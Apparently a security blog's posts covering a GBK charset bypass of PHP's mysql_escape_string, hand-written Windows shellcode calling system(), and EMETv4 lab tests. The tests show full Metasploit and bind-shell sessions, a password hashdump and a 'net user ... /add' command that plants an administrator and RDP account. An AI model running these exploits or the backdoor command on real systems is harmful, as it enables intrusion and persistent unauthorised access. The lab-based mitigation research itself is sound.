Debug – GoSecure!

Mysql_escape_string: the charset vulnerability

Peru — Wed, 16 Apr 2014 11:16:13 +0000

The mysql_escape_string is a deprecated and vulnerable PHP function used to sanitize the user input before it reaches the mysql query.
It escapes most of special character that can be used by a malicious user to perform SQLi.

This is an exampre of how the function works:

root@bt:~# cat /tmp/esc_str.php
function escape_str($s)
{
$mystr = mysql_escape_string($s);
echo "mystr is: " . $mystr . "\n";
}
escape_str(" ' \ ; A B ! % ");
?>

root@bt:~# php /tmp/esc_str.php
mystr is: \' \\ ; A B ! %

In spite of this, as you can see, some sensible chars aren’t escaped like the % that can be useful in a LIKE query.

The mysql_escape_string have some vulnerability partially patched with the mysql_real_escape_string.
Particularly mysql_escape_string don’t require authentication and can be insert before the mysql_connect function.
This means that it doesn’t verify the database character encoding, but analyzes and sanitizes the string one byte at time also if the batabase encoding is multi bytes (GBK, UTF-8, Big5).

Take a look at this example of mysql authentication using PHP code:

function mysqllogin(){
$db_name = "db0001";
$tbl_name = "tb0023";
$user = mysql_escape_string($_POST["login_user"]);
$pswd = mysql_escape_string($_POST["login_pswd"]);
mysql_connect("127.0.0.1", "root", "toor")or die("No MYSQL connection");
mysql_query("SET CHARACTER SET 'gbk'");
mysql_select_db("$db_name")or die("No DB connection");
$sql = "SELECT COUNT(*) FROM tb0023 WHERE user='$user' and pswd='$pswd'";
$rsql = mysql_query($sql) or die(mysql_error());
$rw = mysql_fetch_row($rsql);
if ($rw[0]) {bf
return 1;
} else {
return 0;
}

If we suppose that the db encoding is GBK (in this case I forced it in the PHP code: mysql_query("SET CHARACTER SET 'gbk'")) we can try to take advantage of the use of different encoding type.
First of all let’s try to use PHP to see difference between GBK and ASCII, before and after mysql_escape_string()
Use the follow php sample:

PERU.local

=========================================================

This is a php page with ASCII charset

---------------------------------------------------------

The string passed to mysql_escape_string is \xBF\x27

The output of mysql_escape_string is \xBF\x5c\x27

=========================================================

$lol = "\xbf\x27";
$lol2 = mysql_escape_string($lol);
?>
--------

Image 1

Now modify the previous sample and load it:

...

...

Image 1

As you can see in image 2 the escape (\) char is no longer displayed, this because the mysql_escape_string output is \xbf\x5c\x27
This output is encoded by ASCII (a single character charset) as “\xbf” (an inverted question mark), “\x5c” (\ the escape char) and “\x27” (‘ a single quote).
On the other side (gbk – multibytes) the output is encoded in “\xbf\x5c” (a kanji) and \x27 (‘ a single quote).

Ok, the string that reaches the MySQL will be \xbf\x5c\x27; now, if the charset on MySQL is GBK, the behaviour will be the same of the PHP page: a kanji and a single quote that is what we need for a SQLi.
In the image 3 you can see actually the result:

Image 3

The only encoding I found to be vulnerable are GBK and BIG5 because are the only that have \x5c as second byte of an allowed character.
But you can explore more by referring to this site.
Also I can’t find a way to force the DB chatset before MySQL connection, so I suppose that SQLi can be reached only if the GBK is already the BD charset.

You can try to read the following posts to get more info about mysrl_real_escape and this kind of vulnerability:
https://security.stackexchange.com/questions/8028/does-mysql-escape-string-have-any-security-vulnerabilities-if-all-tables-using-l
https://ilia.ws/archives/103-mysql_real_escape_string-versus-Prepared-Statements.html
https://stackoverflow.com/questions/5741187/sql-injection-that-gets-around-mysql-real-escape-string
https://stackoverflow.com/questions/3665572/mysql-escape-string-vs-mysql-real-escape-string
https://www.sans.org/reading-room/whitepapers/application/web-application-injection-vulnerabilities-web-app-039-s-security-nemesis-34247

Create a custom shellcode using System() function

Peru — Mon, 20 Jan 2014 16:40:15 +0000

Recently I have to write a custom shellcode that accommodate some specific features. Basically I have to avoid the use of some functions like WinExec() and ShellExecute() to create a remote code execution and insert it as payload in a test exploit.
I have to search some other function that allow me to execute command on a remote PC and I found it in the System() call function. I’m not a skilled developer, so what described below is my working solution, maybe not the better solution.

I’m not talking here about the exploit, but only about the shellcode creation and choices motivations. This exemple can be easly fit to other situations and replicated without inserting it in an exploit, but simply tested in a developer or in a custom binary file.

I started from this sample code. It uses the Windows API function MessageBoxA to popup a message

[BITS 32]

mov ebx, 0x00584148 ; Loads a null-terminated string “HAX” to ebx
push ebx ; pushes ebx to the stack
mov esi, esp ; saves null-terminated string “HAX” in esi
xor eax, eax ; Zero our eax (eax=0)
push eax ; Push the fourth parameter (uType) to the stack (value 0)
push esi ; Push the third parameter (lpCaption) to the stack (value HAX\00)
push esi ; Push the second parameter (lpText) to the stack (value HAX\00)
push eax ; Push the first parameter (hWnd) to the stack (value 0)
mov eax, 0x7E45058A ; Move the MessageBoxA address in to eax
call eax ; Call the MessageBoxA function with all parameters supplied.

Looking up the MessageBoxA function in Google reveals four arguments:

int MessageBox(
HWND hWnd,
LPCTSTR lpText,
LPCTSTR lpCaption,
UINT uType
);

So the sample code pushes in the stack all the arguments and then call the address of the function already loaded in memory.

Some things to underline:
– at the end of every argument a null byte is insered (\x00)
– the arguments are pushed in reverse order into the stack (LIFO)
– this is only a shellcode and it has to be appended to a program; this program must have the function MessageBoxA (user32.dll) loaded in memory.
– the address of the function (0x7E45058A) is hadrcoded and works only on the Operating System the shellcode is written for.
– the hardcoded address doesn’t work in random space address context (ASLR or EMET)

Starting from this sample I want to use the System() function to pass commands to the interpreter (typically CMD.EXE); I search in MSDN specifications and I found that it needs only one parameter: the command I want to pass.

system(
"echo A>%tmp%\xx.txt"
);

First I have to determinate, using the debugger, if the function is loaded in memory, so in Olly I search for “Names in all modules” and, luckly I found it in the msvcrt.dll (Figure 1) at address 0x77BF93C7 (Figure 2).

Figure 1

Figure 2

Ok, now I have to convert the string “echo A>%tmp%\xx.txt” in hex, cut it in groups of 4 bytes and invert the order of the groups; also I have to remember to insert the NULL byte at the end of the hex string. These groups will be insered in the stack using the push command and then will group it adding a pointer to the stack.

root@bt:~# echo -ne 'echo A>%tmp%\xx.txt\x00' | xxd -ps | fold -w8 | tac
74787400
5c78782e
746d7025
20413e25
6563686f

So the testing shell code will be like this:

[BITS 32]

PUSH 0x74787400 ; push into the stack, in reverse order, the command 'echo A>%tmp%\xx.txt' adding a NULL byte
PUSH 0x5c78782e
PUSH 0x746d7025
PUSH 0x20413e25
PUSH 0x6563686f
MOV EDI,ESP ; adding a pointer to the stack
PUSH EDI
MOV EAX,0x77BF93C7 ; calling the System() function using the hardcoded address (XP SP3)
CALL EAX

Ok, now I have the test shellcode; I can do it directly in Olly. I open the debugger, attach a program, edit the first few lines, put a brake point at the end of my code and run the program (Figure 3).
Remember that the msvcrt.dll must be one of the module loaded by the program attached to the debugger.

Figure 3

Once the shellcode is ended I verify its work: I go to %tmp% folder and search for the xx.txt file, if all is ok I can insert a better command like

net user test Pa$$word1234 /add & net localgroup administrators test /add & net localgroup "Remote desktop users" test /add

Note that the net user/net localgroup need the admin privilege to be executed, so in a real exploit the target program must be started using elevated rights. On the other hand the first command, the echo one, will work also with low privilege.

EMETv4 – Part 2

Peru — Mon, 24 Jun 2013 14:50:14 +0000

[begin of phase 2] Take a look at the [phase 1]

I continue my tests about EMETv4. This time I’ve installed EMETv4 on the same machine HP-CLI01 and HP-SRV01 (note that framework 4 is required ). The only configuration I set is the “recommended” one.

Test4
Target: Windows Server 2003 SP2 eng; Host Name: HP-SRV01; IP Address: 192.168.34.135
Vulnerability: CVE-2008-4250 (SMB)
Exploit used: ms08_067_netapi from metasploit
EMET agent: installed with recommended settings.

This is MSFConsolle ouput of the exploit:

msf exploit(ms08_067_netapi) > info

Name: Microsoft Server Service Relative Path Stack Corruption
Module: exploit/windows/smb/ms08_067_netapi
Version: 16002
Platform: Windows
Privileged: Yes
License: Metasploit Framework License (BSD)
Rank: Great

Provided by:
hdm
Brett Moore
staylor
jduck

Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.34.135 yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)

msf exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 192.168.34.132:33899
[*] Automatically detecting the target...
[*] Fingerprint: Windows 2003 - Service Pack 2 - lang:Unknown
[*] We could not detect the language pack, defaulting to English
[*] Selected Target: Windows 2003 SP2 English (NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (752128 bytes) to 192.168.34.135
[*] Meterpreter session 1 opened (192.168.34.132:33899 -> 192.168.34.135:1091) at 2013-06-19 20:11:50 +0200

meterpreter > ps

Process List
============

PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process] 4294967295
4 0 System x86 0 NT AUTHORITY\SYSTEM
268 4 smss.exe x86 0 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe
316 268 csrss.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\csrss.exe
340 268 winlogon.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\winlogon.exe
388 340 services.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\services.exe
400 340 lsass.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\lsass.exe
568 388 vmacthlp.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\vmacthlp.exe
588 388 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe
760 388 svchost.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\svchost.exe
816 388 svchost.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\svchost.exe
872 388 svchost.exe x86 0 NT AUTHORITY\LOCAL SERVICE C:\WINDOWS\system32\svchost.exe
888 388 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
1160 888 wmiadap.exe x86 0 NT AUTHORITY\SYSTEM \\?\C:\WINDOWS\system32\WBEM\WMIADAP.EXE
1164 388 spoolsv.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\spoolsv.exe
1200 388 msdtc.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\msdtc.exe
1284 388 cisvc.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\cisvc.exe
1344 388 dfssvc.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\Dfssvc.exe
1376 388 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
1460 388 inetinfo.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\inetsrv\inetinfo.exe
1480 388 ismserv.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\ismserv.exe
1500 388 ntfrs.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\ntfrs.exe
1624 388 svchost.exe x86 0 NT AUTHORITY\LOCAL SERVICE C:\WINDOWS\system32\svchost.exe
1664 388 SLadmin.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\SLadmin\SLadmin.exe
1788 388 SLSmtp.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\SLmail\slsmtp.exe
1848 388 vmtoolsd.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
1876 388 tcpsvcs.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\tcpsvcs.exe
1964 388 SLMail.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\SLmail\SLmail.exe
2104 388 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
2336 388 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
2404 388 TPAutoConnSvc.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\TPAutoConnSvc.exe
2464 388 dllhost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\dllhost.exe
2612 388 alg.exe x86 0 NT AUTHORITY\LOCAL SERVICE C:\WINDOWS\System32\alg.exe
2644 588 wmiprvse.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\wbem\wmiprvse.exe
2824 388 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
3060 588 wmiprvse.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\wbem\wmiprvse.exe
3380 3352 explorer.exe x86 0 HP\Administrator C:\WINDOWS\Explorer.EXE
3444 2404 TPAutoConnect.exe x86 0 HP\Administrator C:\Program Files\VMware\VMware Tools\TPAutoConnect.exe
3488 3380 vmtoolsd.exe x86 0 HP\Administrator C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
3596 388 msiexec.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\msiexec.exe
3924 888 wuauclt.exe x86 0 HP\Administrator C:\WINDOWS\system32\wuauclt.exe
4016 3560 EMET_Agent.exe x86 0 HP\Administrator C:\Program Files\EMET 4.0\EMET_Agent.exe

meterpreter > sysinfo
Computer : HP-SRV01
OS : Windows .NET Server (Build 3790, Service Pack 2).
Architecture : x86
System Language : en_US
Meterpreter : x86/win32
meterpreter >

The target is powned. Take a look at the process number 4016: 4016 3560 EMET_Agent.exe
The EMET_Agent is running but the exploit still works.

Test 5
Target: Windows XP SP3 eng; Host Name: HP-CLI01; IP Address: 192.168.34.134
Vulnerability: CVE-2008-4250 (IE6)
Exploit used: ms10_002_aurora from metasploit
EMET agent: installed with recommended settings.

I setup the exploit exactly as test 2 but this time EMET works well and stops me.
When I start IE6 on the target machine and point to the evil page the aurora exploit cause the crash of Internet Exploter as wished. so I restart the target machine and retry: same result, IE6 crash. I want to double check this and I exclude iexplorer.exe from EMEC configuration and this time the exploit has worked.

This is a drow: exploit 1 – EMEC 1.

Test 6
Target: Windows XP SP3 eng; Host Name: HP-CLI01; IP Address: 192.168.34.134
Vulnerability: CVE-2003-0264 (slmail55_4433)
Exploit used: my version of this well known exploit
EMET agent: installed with recommended settings.

Also in this case, with defaul settings the exploit works:

root@bt:~# nc 192.168.34.134 4444
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Program Files\SLmail\System>tasklist
tasklist

Image Name PID Session Name Session# Mem Usage
========================= ====== ================ ======== ============
System Idle Process 0 Console 0 28 K
System 4 Console 0 236 K
smss.exe 540 Console 0 388 K
csrss.exe 604 Console 0 4,172 K
winlogon.exe 628 Console 0 5,032 K
services.exe 672 Console 0 3,348 K
lsass.exe 684 Console 0 1,532 K
vmacthlp.exe 844 Console 0 2,328 K
svchost.exe 860 Console 0 4,860 K
svchost.exe 944 Console 0 4,348 K
svchost.exe 1036 Console 0 18,140 K
svchost.exe 1092 Console 0 3,340 K
svchost.exe 1224 Console 0 4,236 K
spoolsv.exe 1536 Console 0 5,568 K
explorer.exe 1556 Console 0 18,664 K
vmtoolsd.exe 1688 Console 0 13,560 K
SLadmin.exe 2020 Console 0 3,076 K
SLSmtp.exe 272 Console 0 4,720 K
vmtoolsd.exe 324 Console 0 11,396 K
TPAutoConnSvc.exe 312 Console 0 3,868 K
wscntfy.exe 1368 Console 0 1,964 K
alg.exe 1816 Console 0 3,416 K
TPAutoConnect.exe 2448 Console 0 4,048 K
wuauclt.exe 3200 Console 0 5,048 K
SLMail.exe 564 Console 0 4,940 K
msiexec.exe 3768 Console 0 8,256 K
EMET_Agent.exe 3752 Console 0 27,960 K
cmd.exe 3988 Console 0 2,432 K
tasklist.exe 3980 Console 0 4,076 K
wmiprvse.exe 1628 Console 0 5,528 K

C:\Program Files\SLmail\System>hostname
hostname
hp-cli01

C:\Program Files\SLmail\System>ipconfig | findstr Address ipconfig | findstr Address
IP Address. . . . . . . . . . . . : 192.168.34.134

C:\Program Files\SLmail\System>

Again, after a reboot, EMET doesn’t stop the attack, so I try to adjust some settings. If I modify the profile template from “recommended” to “maximum” and reboot, EMET doesn’t allow the execution of code: the DEP block the execution from the address space. I double check it and retry my attack with basic settings: the exploit is not stopped. Also in this case let’s take 2 steps back and debug the application while EMET is blocking the execution (Image1)

Image 1

The overflow works, writing “A” up to the overwriting of the EIP but when it has to execute the payload it is stopped with message “Access violanion when executing 01C7A154”. That is actualy the address where my payload start to be executed.

Conclusions
I consider the EMET idea extremly useful and I think that this program, if implemented, will be able to increase the system security. Nowaday the bigest problems, from my viewpoint, are:
– not all moules are present and activated (SEHOP e ASLR)
– not all installed programs are controlled by default
– On my tests, on Windows XP, I have a problem with the EMET_agent when start the GUI (image2) and when I reboot (image3).
– I would be happier if FrameWork4 is not a requirement.

Image 2

Image 3

In this situation I will never install this program on a production server, but I will surely follow it, waiting for its evolutions.

EMETv4 – Part 1

Peru — Thu, 20 Jun 2013 12:00:56 +0000

The theory
Microsoft has relased the full edition of the free software EMETv4 “Enhanced Mitigation Experience Toolkit”. The Company puts together some tecnologies such ASLR and DEP to mitigate the risk of system hacking; first of all the “Zero day” attacks. This, thanks to DEP and ASLR, will not only patch Microsoft software, but all software installed. The DEP (Data Execution Prevention) is a technology that associates services or applications to non-executable memory region and blocks code executions from this area (buffer overflow). The ASLR (Address space layout randomization) randomize the address that the application use. If someone bypass the buffer overflow protection and write a script to exploit it, the return address he has to overwrite in the instruction pointer register (EIP or RIP) to redirect the exploit to the payload, is everytime different. This makes considerably more difficult the replica of the exploit.
Well, this is what I understand…therefore there is no other options, I have to test it.

The practice
I will test 3 attacks:
– To Operating system vulnerability (SMB)
– To Microsoft software (IE6)
– To non Microsoft Software (SLMail)

Target machines:
– Windows XP SP3 eng (Host Name: HP-CLI01; IP Address: 192.168.34.134)
– Windows Server 2003 SP2 eng (Host Name: HP-Srv01; IP Address: 192.168.34.135)

Attack machine:
– Linux BackTrack 5R2 (Host Name: bt; IP Address: 192.168.34.132)

Note that both Operating systems and vulnerability are rather old. I use these because I hope that EMET will work well on known exploits, better than with unknown one. So let’s start the phase 1: system without EMETv4.

Test 1
Target: Windows Server 2003 SP2 eng; Host Name: HP-Srv01; IP Address: 192.168.34.135
Vulnerability: CVE-2008-4250 (SMB)
Exploit used: ms08_067_netapi from metasploit

Look at the Metasploit Framework Consolle running on Linux machine:

msf exploit(ms08_067_netapi) > info

Name: Microsoft Server Service Relative Path Stack Corruption
Module: exploit/windows/smb/ms08_067_netapi
Version: 16002
Platform: Windows
Privileged: Yes
License: Metasploit Framework License (BSD)
Rank: Great

Provided by:
hdm
Brett Moore
staylor
jduck

Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.34.135 yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)

Payload information:
Space: 400
Avoid: 8 characters

Description:
This module exploits a parsing flaw in the path canonicalization
code of NetAPI32.dll through the Server Service. This module is
capable of bypassing NX on some operating systems and service packs.
The correct target must be used to prevent the Server Service (along
with a dozen others in the same process) from crashing. Windows XP
targets seem to handle multiple successful exploitation events, but
2003 targets will often crash or hang on subsequent attempts. This
is just the first version of this module, full support for NX bypass
on 2003, along with other platforms, is still in development.

References:
https://cvedetails.com/cve/2008-4250/
https://www.osvdb.org/49243
https://www.microsoft.com/technet/security/bulletin/MS08-067.mspx
https://www.rapid7.com/vulndb/lookup/dcerpc-ms-netapi-netpathcanonicalize-dos

msf exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 192.168.34.132:33899
[*] Automatically detecting the target...
[*] Fingerprint: Windows 2003 - Service Pack 2 - lang:Unknown
[*] We could not detect the language pack, defaulting to English
[*] Selected Target: Windows 2003 SP2 English (NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (752128 bytes) to 192.168.34.135
[*] Meterpreter session 2 opened (192.168.34.132:33899 -> 192.168.34.135:1089) at 2013-06-18 16:23:06 +0200

meterpreter > shell
Process 3792 created.
Channel 1 created.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:\WINDOWS\system32>systeminfo
systeminfo

Host Name: HP-SRV01
OS Name: Microsoft(R) Windows(R) Server 2003, Enterprise Edition
OS Version: 5.2.3790 Service Pack 2 Build 3790
OS Manufacturer: Microsoft Corporation
OS Configuration: Primary Domain Controller
OS Build Type: Uniprocessor Free
Registered Owner: hp
Registered Organization: hp
Product ID: 69713-650-3699384-45501
Original Install Date: 1/20/2013, 12:26:37 AM
System Up Time: 0 Days, 0 Hours, 6 Minutes, 5 Seconds
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: X86-based PC
Processor(s): 1 Processor(s) Installed.
[01]: x86 Family 6 Model 37 Stepping 5 GenuineIntel ~3466 Mhz
BIOS Version: INTEL - 6040000
Windows Directory: C:\WINDOWS
System Directory: C:\WINDOWS\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (GMT+01:00) Amsterdam, Berlin, Bern, Rome, Stockholm, Vienna
Total Physical Memory: 511 MB
Available Physical Memory: 305 MB
Page File: Max Size: 1,044 MB
Page File: Available: 844 MB
Page File: In Use: 200 MB
Page File Location(s): C:\pagefile.sys
Domain: hp.local
Logon Server: N/A
Hotfix(s): 3 Hotfix(s) Installed.
[01]: Q147222
[02]: SP1 - SP
[03]: KB914961 - Service Pack
Network Card(s): 1 NIC(s) Installed.
[01]: Intel(R) PRO/1000 MT Network Connection
Connection Name: Local Area Connection
DHCP Enabled: Yes
DHCP Server: 192.168.34.254
IP address(es)
[01]: 192.168.34.135

C:\WINDOWS\system32>

Test 1 succesfull

Test 2
Target: Windows XP SP3 eng; Host Name: HP-CLI01; IP Address: 192.168.34.134
Vulnerability: CVE-2008-4250 (IE6)
Exploit used: ms10_002_aurora from metasploit

On the Linux machine I start a http server with evil page (https://192.168.34.132:8080/evil) using Metasploit:

Module options (exploit/windows/browser/ms10_002_aurora):

Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
URIPATH /evil no The URI to use for this exploit (default is random)

Payload options (windows/meterpreter/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique: seh, thread, process, none
LHOST 192.168.34.132 yes The listen address
LPORT 4444 yes The listen port

Exploit target:

Id Name
-- ----
0 Automatic

msf exploit(ms10_002_aurora) > exploit
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.34.132:4444
[*] Using URL: https://0.0.0.0:8080/evil
[*] Local IP: https://192.168.34.132:8080/evil
msf exploit(ms10_002_aurora) > [*] Server started.
...
...

Now in the target machine I start Internet Explorer 6, browse to the evil page and the msf consolle continues:

...
...
[*] 192.168.34.134 ms10_002_aurora - Sending Internet Explorer "Aurora" Memory Corruption
[*] Sending stage (752128 bytes) to 192.168.34.134
[*] Meterpreter session 1 opened (192.168.34.132:4444 -> 192.168.34.134:1145) at 2013-06-18 17:00:56 +0200

msf exploit(ms10_002_aurora) > sessions

Active sessions
===============

Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter x86/win32 HP-CLI01\user @ HP-CLI01 192.168.34.132:4444 -> 192.168.34.134:1145 (192.168.34.134)

msf exploit(ms10_002_aurora) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer : HP-CLI01
OS : Windows XP (Build 2600, Service Pack 3).
Architecture : x86
System Language : en_US
Meterpreter : x86/win32
meterpreter > hashdump
Administrator:500:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:5d193c1fc3224fbbbc410375cbf57593:cb30aaad8dc109ef9521bfa868237ee3:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:9fc1f511ad19c511fd4e162ca71fd236:::
user:1003:22124ea690b83bfbaad3b435b51404ee:57d583aa46d571502aad4bb7aea09c70:::

meterpreter > shell
Process 220 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\user\Desktop>systeminfo
systeminfo

Host Name: HP-CLI01
OS Name: Microsoft Windows XP Professional
OS Version: 5.1.2600 Service Pack 3 Build 2600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Workstation
OS Build Type: Uniprocessor Free
Registered Owner: honeypot
Registered Organization: honeypot
Product ID: 76487-640-1479176-23404
Original Install Date: 1/23/2013, 11:06:09 AM
System Up Time: 0 Days, 0 Hours, 9 Minutes, 4 Seconds
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System type: X86-based PC
Processor(s): 1 Processor(s) Installed.
[01]: x86 Family 6 Model 37 Stepping 5 GenuineIntel ~3465 Mhz
BIOS Version: INTEL - 6040000
Windows Directory: C:\WINDOWS
System Directory: C:\WINDOWS\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (GMT-08:00) Pacific Time (US & Canada); Tijuana
Total Physical Memory: 511 MB
Available Physical Memory: 38 MB
Virtual Memory: Max Size: 2,048 MB
Virtual Memory: Available: 2,008 MB
Virtual Memory: In Use: 40 MB
Page File Location(s): C:\pagefile.sys
Domain: WORKGROUP
Logon Server: \\HP-CLI01
Hotfix(s): 5 Hotfix(s) Installed.
[01]: File 1
[02]: File 1
[03]: Q147222
[04]: KB942288-v3 - Update
[05]: KB954550-v5 - Update
NetWork Card(s): 1 NIC(s) Installed.
[01]: VMware Accelerated AMD PCNet Adapter
Connection Name: Local Area Connection
DHCP Enabled: Yes
DHCP Server: 192.168.34.254
IP address(es)
[01]: 192.168.34.134

C:\Documents and Settings\user\Desktop>

Test 2 succesfull

Test 3
Target: Windows XP SP3 eng; Host Name: HP-CLI01; IP Address: 192.168.34.134
Vulnerability: CVE-2003-0264 (slmail55_4433)
Exploit used: my version of this well known exploit

Take a look at the target machine:

C:\Documents and Settings\user>ipconfig | findstr Address
IP Address. . . . . . . . . . . . : 192.168.34.134

C:\Documents and Settings\user>hostname
hp-cli01

C:\Documents and Settings\user>netstat /na | findstr LISTENING
TCP 0.0.0.0:25 0.0.0.0:0 LISTENING
TCP 0.0.0.0:79 0.0.0.0:0 LISTENING
TCP 0.0.0.0:106 0.0.0.0:0 LISTENING
TCP 0.0.0.0:110 0.0.0.0:0 LISTENING
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING
TCP 0.0.0.0:180 0.0.0.0:0 LISTENING
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING
TCP 0.0.0.0:1034 0.0.0.0:0 LISTENING
TCP 0.0.0.0:3389 0.0.0.0:0 LISTENING
TCP 127.0.0.1:1028 0.0.0.0:0 LISTENING
TCP 127.0.0.1:8376 0.0.0.0:0 LISTENING
TCP 192.168.34.134:139 0.0.0.0:0 LISTENING

Now, let’s run the exploit from the attacker machine and re-run netstat

C:\Documents and Settings\user>netstat /na | findstr LISTENING
TCP 0.0.0.0:25 0.0.0.0:0 LISTENING
TCP 0.0.0.0:79 0.0.0.0:0 LISTENING
TCP 0.0.0.0:106 0.0.0.0:0 LISTENING
TCP 0.0.0.0:110 0.0.0.0:0 LISTENING
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING
TCP 0.0.0.0:180 0.0.0.0:0 LISTENING
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING
TCP 0.0.0.0:1034 0.0.0.0:0 LISTENING
TCP 0.0.0.0:3389 0.0.0.0:0 LISTENING
TCP 0.0.0.0:4444 0.0.0.0:0 LISTENING
TCP 127.0.0.1:1028 0.0.0.0:0 LISTENING
TCP 127.0.0.1:8376 0.0.0.0:0 LISTENING
TCP 192.168.34.134:139 0.0.0.0:0 LISTENING

The payload of the exploit was a bind shell on port 4444, indeed a TCP listener is now working this port.
On the Linux machine I am able to connect to this listener a get a remore shell:

root@bt:~# nc -v 192.168.34.134 4444
192.168.34.134: inverse host lookup failed: Unknown server error : Connection timed out
(UNKNOWN) [192.168.34.134] 4444 (?) open
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Program Files\SLmail\System>systeminfo
systeminfo

Host Name: HP-CLI01
OS Name: Microsoft Windows XP Professional
OS Version: 5.1.2600 Service Pack 3 Build 2600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Workstation
OS Build Type: Uniprocessor Free
Registered Owner: honeypot
Registered Organization: honeypot
Product ID: 76487-640-1479176-23404
Original Install Date: 1/23/2013, 11:06:09 AM
System Up Time: 0 Days, 0 Hours, 32 Minutes, 0 Seconds
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System type: X86-based PC
Processor(s): 1 Processor(s) Installed.
[01]: x86 Family 6 Model 37 Stepping 5 GenuineIntel ~3466 Mhz
BIOS Version: INTEL - 6040000
Windows Directory: C:\WINDOWS
System Directory: C:\WINDOWS\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (GMT-08:00) Pacific Time (US & Canada); Tijuana
Total Physical Memory: 511 MB
Available Physical Memory: 299 MB
Virtual Memory: Max Size: 2,048 MB
Virtual Memory: Available: 2,008 MB
Virtual Memory: In Use: 40 MB
Page File Location(s): C:\pagefile.sys
Domain: WORKGROUP
Logon Server: N/A
Hotfix(s): 5 Hotfix(s) Installed.
[01]: File 1
[02]: File 1
[03]: Q147222
[04]: KB942288-v3 - Update
[05]: KB954550-v5 - Update
NetWork Card(s): 1 NIC(s) Installed.
[01]: VMware Accelerated AMD PCNet Adapter
Connection Name: Local Area Connection
DHCP Enabled: Yes
